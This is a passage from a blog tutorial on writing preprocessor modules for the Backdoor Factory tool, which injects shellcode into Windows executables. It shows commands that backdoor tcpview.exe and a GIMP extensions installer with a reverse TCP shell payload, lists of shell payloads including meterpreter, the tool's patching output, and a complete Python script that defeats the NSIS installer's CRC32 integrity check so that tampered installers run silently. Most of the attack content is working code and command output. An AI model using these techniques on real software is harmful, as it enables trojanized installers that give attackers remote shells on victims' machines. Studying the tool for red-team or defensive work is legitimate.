<span style="font-variant-ligatures: no-common-ligatures;"></span><br /></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> # return a result here, if you want</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> return self.result</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"></span><br /></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> def hello(self):</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span>try:</div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"></span> </div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
# add a tab for readability</div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> print '\t[*] Default Template test complete'</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"></span><br /></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> # Of course this doesn't fail</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> except Exception, e:</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> print "Why fail?", str(e)</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> self.result = False</span></div>
</div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;"><br /></span></div>
<br />
<div>
<br /></div>
<div>
As mentioned earlier you can invoke the preprocessor with the '-p' flag as so:</div>
<div>
<br /></div>
<br />
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">./backdoor.py -f tcpview.exe -p -q</span></div>
<div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-tab-span" style="white-space: pre;"> </span> Backdoor Factory</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Author: Joshua Pitts</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Email: the.midnite.runr[-at ]gmail<d o-t>com</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Twitter: @midnite_runr</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> IRC: freenode.net #BDFactory</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Version: 3.4.0</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] In the backdoor module</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Checking if binary is supported</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Gathering file info</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Reading win32 entry instructions</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Executing preprocessor: template</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Running preprocessor template against ALL formats</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Creating temp file: /var/folders/ks/mqxq74qd1qq9y02lq6rjz4g80000gp/T/tmpqEeYSw</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-tab-span" style="white-space: pre;"> </span>[*] Default Template test complete</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">The following WinIntelPE32s are available: (use -s)</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> cave_miner_inline</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> iat_reverse_tcp_inline</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> iat_reverse_tcp_inline_threaded</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> iat_reverse_tcp_stager_threaded</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> iat_user_supplied_shellcode_threaded</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> meterpreter_reverse_https_threaded</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> reverse_shell_tcp_inline</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> reverse_tcp_stager_threaded</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> user_supplied_shellcode_threaded</span></div>
</div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;"><br /></span></div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;"><br /></span></div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;">The '-q' flag is to silence the ascii banner.</span></div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;"><br /></span></div>
<br />
<div>
You'll notice that BDF is asking your for a shellcode to use, that's normal, but if you wanted to just see what your preprocessor is doing, you do not have to set an entire command string as the results would be longer like so:</div>
<div>
<br /></div>
<br />
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -P 8080 -H 127.0.0.1 -m automatic -p -q</span></div>
<div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-tab-span" style="white-space: pre;"> </span> Backdoor Factory</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Author: Joshua Pitts</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Email: the.midnite.runr[-at ]gmail<d o-t>com</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Twitter: @midnite_runr</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> IRC: freenode.net #BDFactory</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Version: 3.4.0</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] In the backdoor module</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Checking if binary is supported</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Gathering file info</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Reading win32 entry instructions</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Executing preprocessor: template</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Running preprocessor template against ALL formats</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Creating temp file: /var/folders/ks/mqxq74qd1qq9y02lq6rjz4g80000gp/T/tmpZsJogJ</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-tab-span" style="white-space: pre;"> </span>[*] Default Template test complete</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Gathering file info</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Overwriting certificate table pointer</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Loading PE in pefile</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Parsing data directories</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Looking for and setting selected shellcode</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Creating win32 resume execution stub</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Looking for caves that will fit the minimum shellcode length of 87</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] All caves lengths: 145, 162, 87</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Attempting PE File Automatic Patching</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[!] Selected: 53: Section Name: .data; Cave begin: 0x45149 End: 0x451ef; Cave Size: 166; Payload Size: 162</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[!] Selected: 45: Section Name: .rdata; Cave begin: 0x3fba0 End: 0x3fc46; Cave Size: 166; Payload Size: 145</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[!] Selected: 39: Section Name: .data; Cave begin: 0x44d5e End: 0x44df3; Cave Size: 149; Payload Size: 87</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Changing flags for section: .rdata</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Changing flags for section: .data</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Patching initial entry instructions</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Creating win32 resume execution stub</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Looking for and setting selected shellcode</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">File tcpview.exe is in the 'backdoored' directory</span></div>
</div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;"><br /></span></div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;">For those that are not familiar with the flags:</span></div>
<div>
<ul>
<li>-P -- Port</li>
<li>-H -- Host</li>
<li>-m -- Mode: automatic, replace, onionduke</li>
<li>-s -- shellcode</li>
<li>-p -- preprocessor</li>
<li>-q -- quiet the ascii banner</li>
<li>-f -- file to patch</li>
</ul>
<div>
To see all options, just do ./backdoor.py -h</div>
<div>
<br /></div>
<div>
OK, we see our template preprocessor is working fine, all it does is just print :</div>
<div>
<br /></div>
<div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Executing preprocessor: template</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Running preprocessor template against ALL formats</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Creating temp file: /var/folders/ks/mqxq74qd1qq9y02lq6rjz4g80000gp/T/tmpZsJogJ</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-tab-span" style="white-space: pre;"> </span>[*] Default Template test complete</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
</div>
<div>
<br />
<br />
Now let's go for a more complex example:<br />
<br />
<b>Nullsoft Scriptable Install System (NSIS) v3.0 CRC32 Bypass</b><br />
<br />
NSIS is a windows installer, mainly used by sourceforge binaries, that has self checking mechanisms to ensure integrity before installing. If the binary is modified within certain ranges you will receive an error like so.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiizFH8PLi_4mkCB4hMJ5HI4FdfXlDmIFCnHLE3gHlHsF4SYyhJzh0c2Sa108HiGjDAeChCbEXmkCjgqjJXicxLMZa0EbTZxus5dyX8ey56RkG_1cGk0FBjCqlRggGq4nL703DkvaSSf5I/s1600/nsis_fail.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiizFH8PLi_4mkCB4hMJ5HI4FdfXlDmIFCnHLE3gHlHsF4SYyhJzh0c2Sa108HiGjDAeChCbEXmkCjgqjJXicxLMZa0EbTZxus5dyX8ey56RkG_1cGk0FBjCqlRggGq4nL703DkvaSSf5I/s320/nsis_fail.png" width="320" /></a></div>
<br />
<br />
Since there is no cryptography involved it pretty easy to bypass. And there are two ways to do it. <br />
<br />
1. Find the CRC32 test/cmp then conditional jump in ASM and patch it out.<br />
2. Or, find the CRC32 location and update it.<br />
<br />
For demoing the preprocessor, I'll just do the first one.<br />
<br />
Here is what the script looks like:<br />
<br />
#==========================<br />
#!/usr/bin/env python<br />
<br />
# settings<br />
# Complete these as you need<br />
#############################################<br />
<br />
# ENABLE preprocessor<br />
enabled = True<br />
<br />
# If you want the temp file used in the preprocessor saved<br />
# THE NAME is self.tmp_file<br />
keep_temp = False<br />
<br />
# check if file is modified beyond patching support<br />
recheck_support = True<br />
<br />
# file format that this is for (PE, ELF, MACHO, or ALL)<br />
# if not specified the processor will run against all<br />
file_format = "PE"<br />
<br />
#############################################<br />
<br />
# add your imports here<br />
import re<br />
<br />
class preprocessor:<br />
<br />
# REQUIRED<br />
def __init__(self, BDF):<br />
<br />
# REQUIRED<br />
self.BDF = BDF<br />
<br />
# Place holder for whether tested binary is a NSIS binary<br />
self.nsis_binary = False<br />
<br />
# REQUIRED<br />
def run(self):<br />
# call your program main here<br />
self.nsis30()<br />
<br />
def nsis30(self):<br />
print '\tNSIS 3.0 CRC32 Check | Patch Out Preprocessor'<br />
with open(self.BDF.tmp_file.name, 'r+b') as self.f:<br />
self.check_NSIS()<br />
if self.nsis_binary is True:<br />
print "\t[*] NSIS 3.0 Binary loaded"<br />
self.patch_crc32_check()<br />
else:<br />
print "\t[*] NSIS 3.0 Binary NOT loaded"<br />
<br />
def check_NSIS(self):<br />
check_one = False<br />
check_two = False<br />
check_three = False<br />
<br />
filecontents = self.f.read()<br />
<br />
# Three quick checks common in NSIS binaries<br />
<br />
if 'NSIS Error'in filecontents:<br />
check_one = True<br />
<br />
if 'Installer integrity check has failed.' in filecontents:<br />
check_two = True<br />
<br />
if 'http://nsis.sf.net/NSIS_Error' in filecontents:<br />
check_three = True<br />
<br />
# All three checks must pass<br />
if check_one is True and check_two is True and check_three is True:<br />
self.nsis_binary = True<br />
<br />
<br />
def patch_crc32_check(self):<br />
# This binary string is fairly unique<br />
p = re.compile("\x3B\x45\x08\x0F\x85\x9C\x00\x00\x00")<br />
self.f.seek(0)<br />
locations = []<br />
match_loc = 0<br />
<br />
for m in p.finditer(self.f.read()):<br />
locations.append(m.start())<br />
<br />
if len(locations) > 1:<br />
# Really this if statement is the same either way, just to let you know there is more<br />
# than one match<br />
print "\t[*] More than one binary match, picking first"<br />
match_loc = locations[0]<br />
else:<br />
match_loc = locations[0]<br />
<br />
print "\t[*] Patch location", hex(match_loc)<br />
<br />
self.f.seek(match_loc + 4)<br />
<br />
#change \x85 to \x84<br />
self.f.write("\x84")<br />
#==========================</div>
</div>
<div>
<br /></div>
<div>
<br />
So what is going on with this script? All I am doing is verifying that the binary is a NSIS binary by checking that three strings exist in the binary and then flipping a bit to set the CRC32 compare result check from jnz (jump if not zero) to jz (jump if zero). So when we change the contents of the file, it will not be zero, there is no error message during execution, and no program exit.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieV_4_MSao5_cN4oJNtI5br_Ty2YrrASueA50nIxW2VkFS7V1Vo7Cot6TdluHleuXiSq6gAkdgIRNZxHtct3cHAvrfan5MQ7m1nOKaEq1ac8GRI_V-afAFJlPSVykKXFMS4OwX9lb5JHw/s1600/NSIS_patch_location.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieV_4_MSao5_cN4oJNtI5br_Ty2YrrASueA50nIxW2VkFS7V1Vo7Cot6TdluHleuXiSq6gAkdgIRNZxHtct3cHAvrfan5MQ7m1nOKaEq1ac8GRI_V-afAFJlPSVykKXFMS4OwX9lb5JHw/s320/NSIS_patch_location.png" width="320" /></a></div>
<br />
Again a better situation will be to find the CRC32 value location, verify that the CRC32 value is actually correct - properly verifying that you are in a NSIS protected binary. Then patching the binary and changing CRC32 to match that of the modified binary. But, I've only written a preprocessor (before patching) and not a post-processor yet. :)<br />
<br />
One thing to note is you should work on the temp file that was created for the preprocessor module. Access it with normal file operations via "with open(self.BDF.tmp_file.name, 'r+b') as self.f:" etc...<br />
You can also access the PE information with self.BDF.flItms, it is a python dict and should be fairly easy to understand for those familiar with PE files. flItms is short for File Items. For the macho and elf files, it is in self.BDF namespace, there is no 'flItms' object as the ELF/Macho formats are fairly easy to manipulate.<br />
<br />
Anyway, this is how it looks when executing against an NSIS 3.0 binary with the NSIS preprocessor enabled:<br />
<br />
$ ./backdoor.py -f GIMP_Extensions_v2.8.20150403.exe -s iat_reverse_tcp_inline -P 8080 -H 127.0.0.1 -m automatic -p -q<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span> Backdoor Factory<br />
Author: Joshua Pitts<br />
Email: the.midnite.runr[-at ]gmail<d o-t>com<br />
Twitter: @midnite_runr<br />
IRC: freenode.net #BDFactory<br />
<br />
Version: 3.4.0<br />
<br />
[*] In the backdoor module<br />
[*] Checking if binary is supported<br />
[*] Gathering file info<br />
[*] Reading win32 entry instructions<br />
[*] Executing preprocessor: nsis_3_0<br />
[*] Running preprocessor nsis_3_0 against PE formats<br />
[*] Creating temp file: /var/folders/p8/l6qk3qcd69z234tpmylk8xhw0000gn/T/tmpaIO1Q4<br />
==================================================<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>NSIS 3.0 CRC32 Check | Patch Out Preprocessor<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>[*] NSIS 3.0 Binary loaded<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>[*] Patch location 0x2224<br />
==================================================<br />
[*] Checking if binary is supported<br />
[*] Gathering file info<br />
[*] Reading win32 entry instructions<br />
[*] Loading PE in pefile<br />
[*] Parsing data directories<br />
[*] Looking for and setting selected shellcode<br />
[*] Creating win32 resume execution stub<br />
[*] Looking for caves that will fit the minimum shellcode length of 42<br />
[*] All caves lengths: 145, 162, 42<br />
[*] Attempting PE File Automatic Patching<br />
[!] Selected: 2133: Section Name: .rsrc; Cave begin: 0x2bbcf End: 0x2bc75; Cave Size: 166; Payload Size: 162<br />
[!] Selected: 1990: Section Name: .rsrc; Cave begin: 0x164af End: 0x16555; Cave Size: 166; Payload Size: 145<br />
[!] Selected: 1998: Section Name: .rsrc; Cave begin: 0x169ff End: 0x16aa5; Cave Size: 166; Payload Size: 42<br />
[*] Changing flags for section: .rsrc<br />
[*] Patching initial entry instructions<br />
[*] Creating win32 resume execution stub<br />
[*] Looking for and setting selected shellcode<br />
[*] Saving TempFile to: tmpauO1Q4_GIMP_Extensions_v2.8.20150403.exe<br />
File GIMP_Extensions_v2.8.20150403.exe is in the 'backdoored' directory<br />
<br />
<br />
You'll see here that the TempFile is saved and will be in the directory where you executed BDF from. However, because no modifications were made to the part of the binary where the CRC is checked, you'll receive an error message if you attempt to execute the temp binary unmodified (pre-patched state). Note: this might fail on non 3.0 NSIS binaries.<br />
<br />
I also added the debug preprocessor, it is enabled by default. When reporting any issues with BDF I recommend including the output in the issue report.<br />
<br />
Example output: <br />
<br />
./backdoor.py -f GIMP_Extensions_v2.8.20150403.exe -q -p<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span> Backdoor Factory<br />
Author: Joshua Pitts<br />
Email: the.midnite.runr[-at ]gmail<d o-t>com<br />
Twitter: @midnite_runr<br />
IRC: freenode.net #BDFactory<br />
<br />
Version: 3.4.0<br />
<br />
[*] In the backdoor module<br />
[*] Checking if binary is supported<br />
[*] Gathering file info<br />
[*] Reading win32 entry instructions<br />
[*] Executing preprocessor: debug<br />
[*] Running preprocessor debug against ALL formats<br />
[*] Creating temp file: /var/folders/p8/l6qk3qcd69z234tpmylk8xhw0000gn/T/tmpVrZAv_<br />
==================================================<br />
************************* DEBUG INFO *************************<br />
XP_MODE : False<br />
SUFFIX : .old<br />
iat_cave_loc : 0<br />
SUPPORT_CHECK : False<br />
PATCH_DLL : True<br />
SUPPLIED_SHELLCODE : None<br />
FILE : GIMP_Extensions_v2.8.20150403.exe<br />
PATCH_METHOD : manual<br />
keep_temp : False<br />
CAVE_JUMPING : False<br />
PORT : None<br />
ORIGINAL_FILE : GIMP_Extensions_v2.8.20150403.exe<br />
CODE_SIGN : False<br />
DISK_OFFSET : 0<br />
SHELL : show<br />
CHANGE_ACCESS : True<br />
SHELL_LEN : 380<br />
NSECTION : sdata<br />
FIND_CAVES : False<br />
PREPROCESS : True<br />
DELETE_ORIGINAL : False<br />
binary : <closed file 'GIMP_Extensions_v2.8.20150403.exe', mode 'r+b' at 0x103428390><br />
IMAGE_TYPE : ALL<br />
SUPPLIED_BINARY : None<br />
HOST : None<br />
INJECTOR : False<br />
tmp_file : <open file '<fdopen>', mode 'w+b' at 0x1034285d0><br />
VERBOSE : False<br />
RUNAS_ADMIN : False<br />
ZERO_CERT : True<br />
OUTPUT : backdoored/GIMP_Extensions_v2.8.20150403.exe<br />
ADD_SECTION : False<br />
CAVE_MINER : False<br />
************************* BEGIN flItms *************************<br />
AddressOfEntryPoint: 0x323c<br />
Architecture: 0x0<br />
BaseOfCode: 0x1000<br />
BaseOfData: 0x7000<br />
BaseReLocationTable: 0x0<br />
BeginSections: 0x1d0<br />
BoundImport: 0x0<br />
BoundImportLOCinCode: 0x0<br />
BoundImportLocation: 0x1a8<br />
BoundImportSize: 0x0<br />
CLRRuntimeHeader: 0x0<br />
COFF_Start: 0xdc<br />
CertLOC: 0x0<br />
CertSize: 0x0<br />
CertTableLOC: 0x170<br />
Characteristics: 0x10f<br />
CheckSum: 0x0<br />
Debug: 0x0<br />
DelayImportDesc: 0x0<br />
DllCharacteristics: 0x8000<br />
ExceptionTable: 0x0<br />
ExportTableRVA: 0x0<br />
ExportTableSize: 0x0<br />
FileAlignment: 0x200<br />
GlobalPrt: 0x0<br />
IAT: 0x28c00007000<br />
IDT_IN_CAVE: False<br />
ImageBase: 0x400000<br />
ImpList: [[4207164, 'sub', 'esp, 0x180', 4207170, bytearray(b'\x81\xec\x80\x01\x00\x00'), 6]]<br />
ImportTableALL:<br />
ImportTableLOCInPEOptHdrs: 0x158<br />
ImportTableRVA: 0x73a4<br />
ImportTableSize: 0xb4<br />
JMPtoCodeAddress: 0x0<br />
LoadConfigTablePresent: False<br />
LoadConfigTableRVA: 0x0<br />
LoadConfigTableSize: 0x0<br />
LoaderFlags: 0x0<br />
LocOfEntryinCode: 0x263c<br />
LocOfEntryinCode_Offset: 0x0<br />
MachineType: 0x14c<br />
Magic: 0x10b<br />
MajorImageVersion: 0x6<br />
MajorLinkerVersion: 0x6<br />
MajorOperatingSystemVersion: 0x4<br />
MajorSubsystemVersion: 0x4<br />
MinorImageVersion: 0x0<br />
MinorLinkerVersion: 0x0<br />
MinorOperatingSystemVersion: 0x0<br />
MinorSubsystemVersion: 0x0<br />
NewIATLoc: 0x28<br />
NumberOfSections: 0x5<br />
NumberofRvaAndSizes: 0x10<br />
OptionalHeader_start: 0xf0<br />
PatchLocation: 0x323c<br />
Reserved: 0x0<br />
ResourceTable: 0x29be80003a000<br />
SectionAlignment: 0x1000<br />
--------------------------------------------------<br />
Section Name .text<br />
Virtual Size 0x5a5a<br />
Virtual Address 0x1000<br />
SizeOfRawData 0x5c00<br />
PointerToRawData 0x400<br />
PointerToRelocations 0x0<br />
PointerToLinenumbers 0x0<br />
NumberOfRelocations 0x0<br />
NumberOfLinenumbers 0x0<br />
SectionFlags 0x60000020<br />
--------------------------------------------------<br />
Section Name .rdata<br />
Virtual Size 0x1190<br />
Virtual Address 0x7000<br />
SizeOfRawData 0x1200<br />
PointerToRawData 0x6000<br />
PointerToRelocations 0x0<br />
PointerToLinenumbers 0x0<br />
NumberOfRelocations 0x0<br />
NumberOfLinenumbers 0x0<br />
SectionFlags 0x40000040<br />
--------------------------------------------------<br />
Section Name .data<br />
Virtual Size 0x1af98<br />
Virtual Address 0x9000<br />
SizeOfRawData 0x400<br />
PointerToRawData 0x7200<br />
PointerToRelocations 0x0<br />
PointerToLinenumbers 0x0<br />
NumberOfRelocations 0x0<br />
NumberOfLinenumbers 0x0<br />
SectionFlags 0xc0000040<br />
--------------------------------------------------<br />
Section Name .ndata<br />
Virtual Size 0x16000<br />
Virtual Address 0x24000<br />
SizeOfRawData 0x0<br />
PointerToRawData 0x0<br />
PointerToRelocations 0x0<br />
PointerToLinenumbers 0x0<br />
NumberOfRelocations 0x0<br />
NumberOfLinenumbers 0x0<br />
SectionFlags 0xc0000080<br />
--------------------------------------------------<br />
Section Name .rsrc<br />
Virtual Size 0x29be8<br />
Virtual Address 0x3a000<br />
SizeOfRawData 0x29c00<br />
PointerToRawData 0x7600<br />
PointerToRelocations 0x0<br />
PointerToLinenumbers 0x0<br />
NumberOfRelocations 0x0<br />
NumberOfLinenumbers 0x0<br />
SectionFlags 0x40000040<br />
--------------------------------------------------<br />
SizeOfCode: 0x5c00<br />
SizeOfHeaders: 0x400<br />
SizeOfHeapCommit: 0x1000<br />
SizeOfHeapReserve: 0x100000<br />
SizeOfImage: 0x64000<br />
SizeOfImageLoc: 0x128<br />
SizeOfInitializedData: 0x1d400<br />
SizeOfOptionalHeader: 0xe0<br />
SizeOfStackCommit: 0x1000<br />
SizeOfStackReserve: 0x100000<br />
SizeOfUninitializedData: 0x400<br />
Subsystem: 0x2<br />
TLS Table: 0x0<br />
TimeDateStamp: 0x4b1ae3c6<br />
VirtualAddress: 0x64000<br />
VrtStrtngPnt: 0x40323c<br />
Win32VersionValue: 0x0<br />
buffer: 0x0<br />
count_bytes: 0x6<br />
curdir: /Users/squirrel/the-backdoor-factory<br />
dis_frm_pehdrs_sectble: 0xf8<br />
filename: GIMP_Extensions_v2.8.20150403.exe<br />
pe_header_location: 0xd8<br />
